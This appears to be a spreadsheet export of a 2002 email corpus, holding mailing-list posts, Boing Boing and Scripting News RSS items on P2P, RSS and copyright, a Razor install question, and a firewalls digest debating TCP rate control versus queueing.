    <t>--==_Exmh_-1577134449P Content-Type: text/plain; charset=us-ascii &gt; From:  Anders Eriksson  &gt; Date:  Wed, 25 Sep 2002 23:22:26 +0200 &gt; &gt;  &gt; It seems that something changed during the last 3-4 weeks. &gt;  &gt; 1) In a folder, msgs 1-n is read, n=current, n upwards is unread. &gt; 2) change to another folder &gt; 3) change back to the original folder and you'll see msg n+1 being  &gt; highlighted as current for a split second, that it changes back to  &gt; n=current. &gt;  &gt; Kind of annoying since it marks msg n+1 as read. I haven't seen what you describe, but I just saw something close to what you  describe.  I think the message that's being incorrectly highlighted as current is related to the current message in the other folder rather than being n+1. I'll have to investigate a bit more to identify and fix the bug, but there is  something going on here. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-1577134449P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9kxPXK9b4h5R0IUIRAq5fAJ43lzUupVkBkj6iJ5Rn7BsBQH5AywCfTAl2 TJnhSBCb4C+1vyt/QjnVOOQ= =94lB -----END PGP SIGNATURE----- --==_Exmh_-1577134449P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 08:01:57 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 08:01:57 -0000</t>
  </si>
  <si>
    <t>WiFi Trek badges</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nBrian sez: Vocera Communications has developed what is essentially a Star Trek: \nTNG-style lapel communicator device that uses WiFi to transmit voice across \nnetworks. \n\n    The Vocera Communications System consists of Vocera Server Software, \n    residing on a customer premise server, and Vocera Communications Badges, \n    which operate over a wireless LAN (802.11b). The badge - which weighs less \n    than 2 ounces - includes a microphone and speaker, LCD readout to display \n    text messages, and an 802.11b wireless radio. It can be clipped to a shirt \n    pocket or collar, or worn on a lanyard.  \n\nLink[1] Discuss[2] (_Thanks, Brian[3]!_)\n\n[1] [URL]http://www.vocera.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://brian.carnell.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.vocera.com http://www.quicktopic.com http://brian.carnell.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 08:01:56 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 08:01:56 -0000</t>
  </si>
  <si>
    <t>Public domain superheroes reborn in Tom Strong</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nGreat piece on the pulp comic characters that appear in the new series of Alan \nMoore's _League of Extraordinary Gentlemen Tom Strong_ (thanks, Zed) funnybook. \nThese characters, like The Terror and The Fighting Yank, are in the public \ndomain because their original publishers didn't register (or renew, it's \nunclear) their copyright, which means that they've been granted a new lease on \nlife in _Tom Strong_. The article segues into a very good discussion of the \npublic domain. This was just Slashdotted, so it might be a little slow, but \nit's worth the wait. Link[1] Discuss[2] (_via /.[3]_)\n\n[1] [URL]http://www.newsarama.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://slashdot.org[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.newsarama.com http://www.quicktopic.com http://slashdot.org</t>
  </si>
  <si>
    <t>Speaking in Texas this Friday</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nJust a reminder: I'm speaking at the University of Texas at Austin at 7PM this \nFriday -- giving a talk on Hollywood's legislative agenda, sponsored by \nEFF-Austin, ACTLab, and ACLU-Texas. Love to see you there! Link[1] Discuss[2]\n\n[1] [URL]http://effaustin.org[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://effaustin.org http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 08:01:55 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 08:01:55 -0000</t>
  </si>
  <si>
    <t>Labels shoot selves in foot by focusing on stopping P2P</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nA new KPMG study concludes that the RIAA and its member companies are hurting \nthemselves by focusing on cracking down on P2P sharing instead of figuring out \nways to earn a living with it. \n\n    Media companies must put less emphasis on protecting digital content and \n    instead find ways to make money from digital music and movies if they hope \n    to beat back copyright pirates who threaten their businesses, according to \n    a study released on Wednesday from KPMG... \n\n    "They complain about the Napsters," she said, referring to the bankrupt \n    music swap site that was found to violate U.S. copyright laws. "But why do \n    the Napsters exist, because the marketplace wants them." \n\n    Steel said that if the issue "is not on boardroom table ... then that \n    boardroom has problems."  \n\nLink[1] Discuss[2] (_Thanks, Michael!_)\n\n[1] [URL]http://story.news.yahoo.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 08:01:37 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 08:01:37 -0000</t>
  </si>
  <si>
    <t>Medical notes</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 12:49:48 GMT\n\nMixed news from yesterday's heart checkup. \n\nFirst, I went seven minutes on the treadmill. That was pretty good. My heart \nwas racing like it hadn't since I was in college. They also did an extensive \nultrasound on my carotid arteries[1], they're in the neck and supply my head \nwith blood. More good news there. They're clear, free of plaque, healthy, not \ndiseased[2]. So it appears I just have coronary artery disease, not general \nartery disease. That's good because there would be a risk of stroke if they \nwere sick, and not a whole lot they can do about it (as they can with the \nheart). \n\nNow there was some not-good news. A small part of my heart isn't working very \nwell. There are a few possible reasons for that, some fixable, some not. I \nasked the doctor, does this mean I'm going to die sooner, and he said no. Does \nit mean I have to restrict what I do, he said no. So what does it mean? Really \nnot much, other than I should watch, as before, for recurring symptoms, the \nones that brought me into the hospital in June. If they come back, we'll do an \nangiogram, and maybe an angioplasty, but the likelihood of another bypass \nbecause of this is small. That's quite a relief. I don't like the idea of part \nof my heart not working, but what can you do about it?\n\n[1] [URL]http://www.google.com[/URL]\n[2] [URL]http://www.vascularweb.org[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.google.com http://www.vascularweb.org</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 08:01:36 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 08:01:36 -0000</t>
  </si>
  <si>
    <t>A productive thread</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Thu, 26 Sep 2002 00:18:04 GMT\n\n"rssflowersalignright"A productive thread[1] on RSS-DEV confronts the \nnegativeness about RSS 2.0[2] head-on. This will go someplace interesting.  \n\nI left a big hint there in the way the blogChannel module[3] is designed, \npatterned after the Syndication module[4] designed by the RDF folk. In other \nwords, the place where they're expressing discomfort with RSS 2.0 is where they \ncan make it their own. Lead. Instead of feeling disempowered, be powerful.  \n\nAt one point I saw clearly where the compromise between RSS 0.9x and 1.0 was. \nWe could have gotten there in early 2001, so instead we get there in late 2002. \nSo what, not a big deal. Think about how much better it will be _when we're all \nadvocating the same format._ Visualize peace. That's basically what I did when \nI did the 2.0 spec. I know it's hard to swallow, but swallow anyway. If I did \nit, you can too.\n\n[1] [URL]http://groups.yahoo.com[/URL]\n[2] [URL]http://backend.userland.com[/URL]\n[3] [URL]http://backend.userland.com[/URL]\n[4] [URL]http://web.resource.org[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://groups.yahoo.com http://backend.userland.com http://backend.userland.com http://web.resource.org</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 08:01:31 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 08:01:31 -0000</t>
  </si>
  <si>
    <t>Ray Ozzie: "How long before we see auto pingback generator spambots?"</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 12:49:00 GMT\n\nRay Ozzie[1]: "How long before we see auto pingback generator spambots?"\n\n[1] [URL]http://www.ozzie.net[/URL]</t>
  </si>
  <si>
    <t>John Robb: "Yesterday, AT&amp;T upgraded my cable box to a digital</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 12:24:45 GMT\n\nJohn Robb[1]: "Yesterday, AT&amp;T upgraded my cable box to a digital system."\n\n[1] [URL]http://jrobb.userland.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://jrobb.userland.com</t>
  </si>
  <si>
    <t>Reuters: "Pets may not only provide good company for their</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 15:14:00 GMT\n\nReuters[1]: "Pets may not only provide good company for their owners, they may \nalso help lower stress, according to new study findings."\n\n[1] [URL]http://abcnews.go.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://abcnews.go.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 08:01:30 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 08:01:30 -0000</t>
  </si>
  <si>
    <t>Great email from the RIAA's Hillary Rosen to execs at Yahoo,</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 12:34:49 GMT\n\nGreat email[1] from the RIAA's Hillary Rosen to execs at Yahoo, Real, AOL and \nMicrosoft, on how to crack down on the millions of Morpheus and Kazaa users. Is \nthis for real?\n\n[1] [URL]http://www.dotcomscoop.com[/URL]</t>
  </si>
  <si>
    <t>Ben Silverman, the publisher of Dotcom Scoop, says the Rosen</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 14:04:44 GMT\n\nBen Silverman, the publisher of Dotcom Scoop, says the Rosen email is real, and \npart of a confidential internal memo[1] that outlines the RIAA's legal strategy \nre Kazaa, Music City and Grokster. \n\n[1] [URL]http://www.dotcomscoop.com[/URL]</t>
  </si>
  <si>
    <t>Jeremy Bowers: "None of the trackback mechanisms has reached the</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 12:12:19 GMT\n\nJeremy Bowers[1]: "None of the trackback mechanisms has reached the critical \nmass necessary to see the negative effects experienced in all other community \nmodels."\n\n[1] [URL]http://www.jerf.org[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.jerf.org</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 08:01:29 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 08:01:29 -0000</t>
  </si>
  <si>
    <t>Fred Grott: How to Keep RDF and RSS Straight.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 12:36:11 GMT\n\nFred Grott: How to Keep RDF and RSS Straight[1].\n\n[1] [URL]http://www.diaries.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.diaries.com</t>
  </si>
  <si>
    <t>Jon Hanna, on the RSS-DEV list, says that RSS, was "not designed</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 13:25:23 GMT\n\nJon Hanna, on the RSS-DEV list, says[1] that RSS, was "not designed to be of \nany particular use to bloggers, aggregators, or metadata providers." This is \nnot true. Half of RSS 0.91 was scriptingNews format[2], which was totally \ndesigned to model a weblog in XML. \n\n[1] [URL]http://groups.yahoo.com[/URL]\n[2] [URL]http://my.userland.com[/URL]$11</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://groups.yahoo.com http://my.userland.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 08:01:27 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 08:01:27 -0000</t>
  </si>
  <si>
    <t>Wired: "Stronger ties between ISPs and file-trading companies</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 15:33:10 GMT\n\nWired[1]: "Stronger ties between ISPs and file-trading companies could bolster \nKazaa's defenses."\n\n[1] [URL]http://www.wired.com[/URL],1285,55356,00.html</t>
  </si>
  <si>
    <t>Thanks to Jenny for the pointer to this Yale Law article about</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 13:48:40 GMT\n\nThanks to Jenny[1] for the pointer to this Yale Law article[2] about The \nWayback Machine removing articles about Scientology. "While Lawmeme doesn't \nknow all the details of Scientology's request to the Internet Archive, \nespecially the extent of websites removed, we do know that the Internet Archive \nis blocking all archived versions of one of Scientology's leading critics and \nthe main target in the Google Affair, Xenu.net."\n\n[1] [URL]http://www.theshiftedlibrarian.com[/URL]\n[2] [URL]http://research.yale.edu[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.theshiftedlibrarian.com http://research.yale.edu</t>
  </si>
  <si>
    <t>[IMG: http://radio.weblogs.com/0001015/images/2002/09/25/uncSamMedium.gif</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 12:39:47 GMT\n\n[IMG: [URL]http://radio.weblogs.com[/URL] (A \npicture named uncSamMedium.gif)][1]Last year on this day[2]: "It's been \nnot-correct for most of my life for Americans to say we love our country. \nThat's a big bug. We're the world's greatest country and we know it. I love the \nUSA. It gave me life, an education, role models and a philosophy. And if you \nthink we're stupid or decadent, just try fucking with us."\n\n[1] [URL]http://www.scripting.com[/URL]\n[2] [URL]http://scriptingnews.userland.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://radio.weblogs.com http://www.scripting.com http://scriptingnews.userland.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 08:01:26 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 08:01:26 -0000</t>
  </si>
  <si>
    <t>Ken Dow reports that the current version of OmniOutliner can read</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 15:47:05 GMT\n\nKen Dow reports[1] that the current version of OmniOutliner can read and write \nOPML. This means, for example, with a little Radio script (or an AppleScript) \nyou could use Omni as an Instant Outliner[2].\n\n[1] [URL]http://radio.weblogs.com[/URL]\n[2] [URL]http://davenet.userland.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://radio.weblogs.com http://davenet.userland.com</t>
  </si>
  <si>
    <t>Jeremy Zawodny on life in Silicon Valley: "I came out here to</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 21:46:48 GMT\n\nJeremy Zawodny[1] on life in Silicon Valley: "I came out here to work at a \ncompany that has since forgotten how to innovate and take risks. Yippie."\n\n[1] [URL]http://jeremy.zawodny.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://jeremy.zawodny.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 08:01:25 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 08:01:25 -0000</t>
  </si>
  <si>
    <t>Daypop is back. _Ye-hi._</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Thu, 26 Sep 2002 01:31:40 GMT\n\nDaypop[1] is back. _Ye-hi._\n\n[1] [URL]http://www.daypop.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.daypop.com</t>
  </si>
  <si>
    <t>Ed Cone: "The House Subcommittee on Courts, the Internet, and</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 19:25:19 GMT\n\nEd Cone[1]: "The House Subcommittee on Courts, the Internet, and Intellectual \nProperty will hold a hearing on 'Piracy of Intellectual Property on \nPeer-to-Peer Networks' at 9AM., Thursday, September 26, (2141 Rayburn House \nOffice Building). The Berman-Coble bill will be discussed. The hearings are \nopen to the press."\n\n[1] [URL]http://radio.weblogs.com[/URL]</t>
  </si>
  <si>
    <t>Gracie Allen: "Never put a period where God has placed a comma."</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 22:23:55 GMT\n\nGracie Allen[1]: "Never put a period where God has placed a comma."\n\n[1] [URL]http://www.inspirationpeak.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.inspirationpeak.com</t>
  </si>
  <si>
    <t>Liberation: Les jouebs, stars editoriales du Web.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 16:59:11 GMT\n\nLiberation: Les jouebs, stars editoriales du Web[1].\n\n[1] [URL]http://www.liberation.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.liberation.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 08:01:23 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 08:01:23 -0000</t>
  </si>
  <si>
    <t>p2p is not a crime</t>
  </si>
  <si>
    <t>URL: [URL]http://www.aaronsw.com[/URL]\nDate: 2002-09-25T17:11:31-06:00\n\nYou can see Cory Doctorow explain the problems with the Berman Bill while his \nhost subscribes to the EFF Action Center on TechTV[1] if you've got Windows \nMedia Player. If you're on Windows, you can also hear them. (The Mac version \ndoesn't seem to have the codec for the sound.) \n\n[IMG: [URL]http://www.archive.org[/URL]][2]\n\nThe Internet Archive Bookmobile, starring the Kahles[3]. \n\nSeth[4]: "I had a dream that I went to D.C. to hear the Eldred argument and \nalso dropped by a party to celebrate it. [...] y dream Supreme Court was \ndefinitely going to reverse the court below, if only because the Solicitor \nGeneral in my dream had hardly found anything good to say about the CTEA. _\nAdsit omen! _"\nDonna of Copyfight linked to my fair use notes[5]. \n\nAn archived stream of the Tauzin hearing will be available soon[6].\n\n\n\n[1] [URL]http://www.techtv.com[/URL],24330,3399006,00.html\n[2] [URL]http://www.archive.org[/URL]\n[3] [URL]http://www.kahle.org[/URL]\n[4] [URL]http://vitanuova.loyalty.org[/URL]\n[5] [URL]http://www.corante.com[/URL]\n[6] [URL]http://energycommerce.house.gov[/URL]</t>
  </si>
  <si>
    <t>http://www.aaronsw.com http://www.archive.org http://www.techtv.com http://www.archive.org http://www.kahle.org http://vitanuova.loyalty.org http://www.corante.com http://energycommerce.house.gov</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 08:01:22 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 08:01:22 -0000</t>
  </si>
  <si>
    <t>Fuzzy Math</t>
  </si>
  <si>
    <t>URL: [URL]http://www.aaronsw.com[/URL]\nDate: 2002-09-25T18:54:10-06:00\n\nOne of the weirdest things I heard when listening to the Cato Institute debate \nwas an economist claim "a tenet of my profession is that people won't pay for \nsomething they can get for free." Someone objected, using the analogy of \nbottled water. There's a far better example: The New York Times.  \n\nIncredibly, this institution puts out pages and pages of high-quality \nprofessional content each week and then distributes them by means of men in \ntrucks across the country overnight where they sit, waiting to be sold to \npeople. Meanwhile, the exact same content is available _for free_ using an \ninsidious peer-to-peer downloading system called "the Web" by typing in the \nkeyword "[URL]www.nytimes.com[/URL]". Those people at the New York Times must not \nunderstand the Internet or something! \n\nMore examples: the thriving shareware market, the Baen Free Library, Janis Ian \nand others. \n\nOther times, people claim that no one will create if they can't get paid. I'd \nlike to introduce you to free software and just about every weblog on the \nplanet.</t>
  </si>
  <si>
    <t>http://www.aaronsw.com www.nytimes.com</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Jeff Barr" &lt;jeff@vertexdev.com&gt;\nDate: Thu, 26 Sep 2002 05:32:01 -0700</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 05:32:01 -0700</t>
  </si>
  <si>
    <t>"Jeff Barr" &lt;jeff@vertexdev.com&gt;</t>
  </si>
  <si>
    <t>Re: Digital radio playlists are prohibited?!</t>
  </si>
  <si>
    <t>&gt; Subject: Re: Digital radio playlists are prohibited?! &gt; From: James Rogers  &gt; To: fork@spamassassin.taint.org &gt; Date: 25 Sep 2002 12:52:15 -0700 &gt;  &gt; On Wed, 2002-09-25 at 01:19, Rohit Khare wrote: &gt; &gt; Anyone heard of this law before? &gt;  &gt;  &gt; Absolutely.  More accurately, it is part of the RIAAs "regulation" for &gt; broadcasting music under their auspices.  This is actually part of the &gt; default statutory license the RIAA is compelled to issue.  You can try &gt; and establish your own contract with each of the individual publishers &gt; in addition to the writers, but that is a Herculean undertaking in its &gt; own right.  The details are really gross and complicated. Perhaps the stations cannot publish digital playlists, but you can get them from [URL]www.starcd.com[/URL] anyway. They use some sort of listening and recognition technology to identify the music played on over 1000 US radio stations. Jeff;</t>
  </si>
  <si>
    <t>www.starcd.com</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Thu, 26 Sep 2002 02:00:32 +0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 02:00:32 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-09-26</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * Using Web Services with Perl and AppleScript\n\n+--------------------------------------------------------------------+\n| Using Web Services with Perl and AppleScript                       |\n|   posted by pudge on Wednesday September 25, @08:12 (links)        |\n|   [URL]http://use.perl.org[/URL]               |\n+--------------------------------------------------------------------+\n\n[0]jonasbn writes "An article on [1]Perl, AppleScript, and Web Services\nby Randal L. Schwartz has been published on O'ReillyNet." See AppleScript\nand Perl work together!\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:jonasbnNO@SPAMe-diot.dk\n    1. [URL]http://www.oreillynet.com[/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oreillynet.com http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Thu, 26 Sep 2002 02:00:23 +0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 02:00:23 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-09-26</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nUsing Web Services with Perl and AppleScript\n    posted by pudge on Wednesday September 25, @08:12 (link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SpamAssassin-Talk list &lt;SpamAssassin-talk@example.sourceforge.net&gt;\nFrom: Doug Crompton &lt;doug@crompton.com&gt;\nDate: Thu, 26 Sep 2002 01:05:28 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 01:05:28 -0400 (EDT)</t>
  </si>
  <si>
    <t>SpamAssassin-Talk list &lt;SpamAssassin-talk@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>[SAtalk] Razor problem</t>
  </si>
  <si>
    <t>I just picked up Razor SDK 2.03 and  2.14 agents from the the razor site.\nI am using SuSe 7.3 - intalled SDK with no problems. All tests passed.\n\nWhen I try to make the 2.14 agents I get all kinds of errors. In\nparticuliar it says the net::dns is missing. But it seems to be there. The\nSDK test passes it.\n\nAny help would be appreciated.\n\nDoug\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: firewalls digest users &lt;ecartis@isc.org&gt;\nFrom: ISC Mailing List Manager &lt;ecartis@isc.org&gt;\nDate: Thu, 25 Jul 2002 23:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 23:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ISC Mailing List Manager &lt;ecartis@isc.org&gt;</t>
  </si>
  <si>
    <t>firewalls digest users &lt;ecartis@isc.org&gt;</t>
  </si>
  <si>
    <t>firewalls Digest V1 #33</t>
  </si>
  <si>
    <t>firewalls Digest	Thu, 25 Jul 2002	Volume: 01  Issue: 033 In This Issue: 		Re: QOS 		FW: disable some sites 		DNAT with iptables question 		RE: DNAT with iptables question ---------------------------------------------------------------------- From: "George J. Jahchan"  Subject: Re: QOS Date: Thu, 25 Jul 2002 12:11:40 +0300 &gt; So, I'm forced to conclude that the PacketShaper either sucks in a major &gt; way, or that your explanation/the explanation that you have been given of &gt; it is wrong. (Sorry.) You are wrong on both counts. Explanation is valid for symmetrical TCP, for others see explanations below. &gt; Yes, all packets in an established TCP connection have the ACK flag set. &gt; So all packets except SYNs are candidates for delay when traffic limits &gt; are exceeded? Whoops. You should change that to: ... are always candidates for predictive or preventive delay. ACKs are delayed (per flow) in such a way that WAN-bound traffic reaching the edge router's Ethernet interface does not exceed WAN link speed (NO ROUTER QUEUES!). It does not wait for the link to be at or near saturation to act -- that is why, unlike queueing, it is predictive and not reactive. It slows down the rate of transmission of sending hosts (on a per-flow basis) to accommodate WAN link speed limit and current network utilization, rather than fill up queues at LAN speeds and empty them at WAN speeds, eventually dropping the excess once the queue(s) fill up, informing hosts to slow down their rate of transmission once queues are beyond a fixed threshold (90%?). Rate control works equally well for outbound and inbound traffic. Ever heard of an effective queueing technology for inbound traffic? Queueing packets after they have crossed a congested link does not make much sense, does it? Re: IPsec/GRE or other encapsulated traffic It obviously cannot dissect IPsec/GRE or other encapsulated traffic: it sees the tunnel as one connection if the tunneling device is before the PS on the LAN side (VPN gateway and router are two separate devices, PS between them). If the router does the tunneling, then the PS sees clear traffic. Typically, in an organization the first scenario would be the case at headquarters and the second at branch offices. The PS at the branch sees traffic inside the tunnel whereas the unit at HQ sees all traffic as one tunnel which allows full management of both tunneled and clear traffic at both ends. UDP and asymmetrical TCP (where the PS and router only see the outgoing packet, return traffic coming back through a satellite downlink to a station on the LAN) are handled differently. For asymmetrical TCP, it will time the release of packets to the receiving device, thereby indirectly timing the release of acknowledgements by the receiving host. This informs the sender's TCP/IP stack that it should slow the release of packets because limited bandwidth is available. For UDP, it utilizes flow-based derivative random drop. It selectively drops only one packet at a time from flows that are predicted to cause congestion, which prevents heavy retransmissions and application timeouts. ICMP packets exceeding policy limits are dropped. &gt;_Maybe_ you can do a special case for TCP and try to offload some of the queueing on &gt; the endpoints, but I really don't see the real gain in that. The real gain is manageability and control. A LAN host only knows about the state of its own connections and is oblivious to WAN conditions until its TCP/IP stack learns (when router queues are nearly full) that the WAN is congested. A PS will predict and inform the LAN hosts' TCP/IP stacks of the "speed limit to obey" for every connection (based on policies and network conditions), avoiding congestion. Control for asymmetrical TCP and UDP may not be as "tight" as for symmetrical TCP, but it does work. Queueing is akin to deploying cops only when traffic jams occur, vs. rate control where cops are permanently deployed throughout town, communicating with each other and with a central control point, predicting upcoming congestion and regulating traffic, ensuring a smooth flow of traffic. If there is potential for congestion, it will take a driver a hell of lot longer to cross town with first approach than it will with the second. Do you agree? ----- Original Message ----- From: "Mikael Olsson"  To: "George J. Jahchan"  Cc: "Firewalls List"  Sent: Wednesday, July 24, 2002 4:50 pm Subject: Re: QOS "George J. Jahchan" wrote: &gt; &gt; The whole purpose of the device is to pro-actively prevent WAN congestion -- &gt; it sits between client and server (client inside/server outside or client &gt; outside/server inside -- it does not make any difference) and pro-actively &gt; adjusts the TCP window size (by delaying the acknowledgement) to get the &gt; sending host to honor the speed limit for that individual connection &gt; (calculated in real-time based on user-defined policies and current network &gt; conditions). Umm, don't get me wrong here, but I think you've been fed a less-than- accurate sales pitch. Let's ponder this for a minute. The device works by delaying ACKs... that is: packets with the ACK flag set, right? ... [letting this sink in for a while] ... Yes, all packets in an established TCP connection have the ACK flag set. So all packets except SYNs are candidates for delay when traffic limits are 